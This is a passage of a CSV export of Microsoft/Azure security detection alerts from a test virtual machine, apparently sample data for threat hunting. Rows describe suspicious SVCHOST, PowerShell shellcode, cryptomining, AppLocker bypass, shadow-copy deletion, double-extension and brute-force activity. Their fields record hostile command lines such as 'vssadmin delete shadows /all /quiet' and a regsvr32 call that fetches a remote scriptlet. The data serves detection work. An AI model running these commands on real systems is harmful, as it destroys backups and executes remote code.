]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
54,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:16,2019-01-15 09:15:16,117b7a02-d1d0-4cf2-bc04-0b19a796b4d3,2518547570835168086_117b7a02-d1d0-4cf2-bc04-0b19a796b4d3,Detection,Microsoft,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,The system process SVCHOST was observed running in an abnormal context. Malware often use SVCHOST to masquerade its malicious activity.,High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""command line"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1288"",
""account logon id"": ""0x13bded7"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x165c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=LiZbrhSiqrXmXZ40VjKfTmBwA2%2Fllxv7YXgBcwv1MNM%3D&spr=https&st=2019-01-14T15:59:38Z&se=2019-04-14T16:14:38Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1288"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:16.4831913Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:16.4831913Z"",
""EndTimeUtc"": ""2019-01-15T09:15:16.4831913Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
55,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:11,2019-01-15 09:15:11,c762b0f7-a0f5-4dda-ab48-54b5ae6eade4,2518547570883109415_c762b0f7-a0f5-4dda-ab48-54b5ae6eade4,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-shellcode.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xaa8"",
""Suspicious Script"": "".\\powershell Invoke-Shellcode.ps1"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xaa8"",
""CommandLine"": "".\\powershell invoke-shellcode.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:11.6890584Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:11.6890584Z"",
""EndTimeUtc"": ""2019-01-15T09:15:11.6890584Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
56,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:10,2019-01-15 09:15:10,72351be4-ae78-4cc6-9f6a-1ff87c31baeb,2518547570895430544_72351be4-ae78-4cc6-9f6a-1ff87c31baeb,Detection,Microsoft,Digital currency mining related behavior detected,Digital currency mining related behavior detected,Digital currency mining related behavior detected,Analysis of host data on MSTICALERTSWIN1 detected the execution of a process or command normally associated with digital currency mining.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\suchost.exe"",
""Suspicious Command Line"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1704"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""suchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1704"",
""CommandLine"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:10.4569455Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:10.4569455Z"",
""EndTimeUtc"": ""2019-01-15T09:15:10.4569455Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
57,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:07,2019-01-15 09:15:07,9868ed7d-397e-4aa4-8dbd-5a1c5f736c1e,2518547570924760670_9868ed7d-397e-4aa4-8dbd-5a1c5f736c1e,Detection,Microsoft,Potential attempt to bypass AppLocker detected,Potential attempt to bypass AppLocker detected,Potential attempt to bypass AppLocker detected,"Analysis of host data on MSTICALERTSWIN1 detected a potential attempt to bypass AppLocker restrictions. AppLocker can be configured to implement a policy that limits what executables are allowed to run on a Windows system. The command line pattern similar to that identified in this alert has been previously associated with attacker attempts to circumvent AppLocker policy by using trusted executables (allowed by AppLocker policy) to execute untrusted code. This could be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x173c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x173c"",
""CommandLine"": "".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:07.5239329Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:07.5239329Z"",
""EndTimeUtc"": ""2019-01-15T09:15:07.5239329Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
58,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:16,2019-01-15 09:15:16,b9d79b27-d725-4a87-b7ec-6fc9ec591e8c,2518547570836431794_b9d79b27-d725-4a87-b7ec-6fc9ec591e8c,Detection,Microsoft,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,"Analysis of host data has detected a shadow copy deletion activity on the resource.
Volume Shadow Copy (VSC) is an important artifact that stores data snapshots.
Some malware and specifically Ransomware, targets VSC to sabotage backup strategies.",High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\system32\\vssadmin.exe"",
""command line"": ""vssadmin delete shadows /all /quiet"",
""parent process"": ""cmd.exe"",
""process id"": ""0x12b8"",
""account logon id"": ""0x13bded7"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x165c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=md0FA0lp6ylACLI8tXMVySYKT9S%2FHWJh8VkZ5YrTgSE%3D&spr=https&st=2019-01-14T15:22:59Z&se=2019-04-14T15:37:59Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=bdb7e59d-8ba8-4351-aa6d-eedc6b916aa5\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""vssadmin.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x12b8"",
""CommandLine"": ""vssadmin delete shadows /all /quiet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:16.3568205Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:16.3568205Z"",
""EndTimeUtc"": ""2019-01-15T09:15:16.3568205Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
59,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:16,2019-01-15 09:15:16,c45bcb62-9d89-44e8-bea9-7a9e35205576,2518547570836535349_c45bcb62-9d89-44e8-bea9-7a9e35205576,Detection,Microsoft,Suspicious double extension file executed,Suspicious double extension file executed,Suspicious double extension file executed,"Analysis of host data indicates an execution of a process with a suspicious double extension.
This extension may trick users into thinking files are safe to be opened and might indicate the presence of malware on the system.",High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""command line"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x17b0"",
""account logon id"": ""0x13bded7"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x165c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious Double Extensions\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-Double-Extensions.pdf?sv=2018-03-28&sr=b&sig=rUQfTnOeu6Di%2BeniujzU25k1ZRHFUq6xFYsDPUWQf%2BM%3D&spr=https&st=2019-01-14T14:13:02Z&se=2019-04-14T14:28:02Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""doubleextension.pdf.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x17b0"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:16.346465Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:16.346465Z"",
""EndTimeUtc"": ""2019-01-15T09:15:16.346465Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
60,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:14,2019-01-15 09:15:14,43f7d8f3-fea5-4fca-a884-713c2d65203c,2518547570851316041_43f7d8f3-fea5-4fca-a884-713c2d65203c,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,Machine logs indicate that the suspicious process: 'c:\diagnostics\usertmp\dubrute.exe' was running on the machine; this process is associated with carrying out brute force attacks. An attacker may have compromised this host as a launchpad for carrying out further attacks.',High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\dubrute.exe"",
""Suspicious Command Line"": "".\\dubrute.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x166c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""dubrute.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x166c"",
""CommandLine"": "".\\dubrute.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:14.8683958Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:14.8683958Z"",
""EndTimeUtc"": ""2019-01-15T09:15:14.8683958Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
61,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:16,2019-01-15 09:15:16,26ccc2ad-8ce0-4f60-8215-18f99377b547,2518547570834399134_26ccc2ad-8ce0-4f60-8215-18f99377b547,Detection,Microsoft,Rare SVCHOST service group executed,Rare SVCHOST service group executed,Rare SVCHOST service group executed,The system process SVCHOST was observed running a rare service group. Malware often use SVCHOST to masquerade its malicious activity.,Informational,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\system32\\svchost.exe"",
""command line"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""parent process"": ""cmd.exe"",
""process id"": ""0x134c"",
""account logon id"": ""0x13bded7"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x165c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=LiCwFh64yyJn1k1fvbXfd7nZFxe9c4Y852b0VekrMJw%3D&spr=https&st=2019-01-14T14:11:54Z&se=2019-04-14T14:26:54Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=dbb5dbe9-5ab7-455f-96cf-d88ac58c1c00\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x134c"",
""CommandLine"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:16.5600865Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:16.5600865Z"",
""EndTimeUtc"": ""2019-01-15T09:15:16.5600865Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
62,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:17,2019-01-15 09:15:17,48327b74-c904-402d-a1d8-2b3a882924e7,2518547570821365949_48327b74-c904-402d-a1d8-2b3a882924e7,Detection,Microsoft,Ransomware indicators detected,Ransomware indicators detected,Ransomware indicators detected,"Analysis of host data indicates suspicious activity traditionally associated with lock-screen and encryption ransomware. Lock screen ransomware displays a full-screen message preventing interactive use of the hsot and access to its files. Encryption ransomware prevents access by encrypting data files. In both cases a ransom message is typically displayed, requesting payment in order to restore file access.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
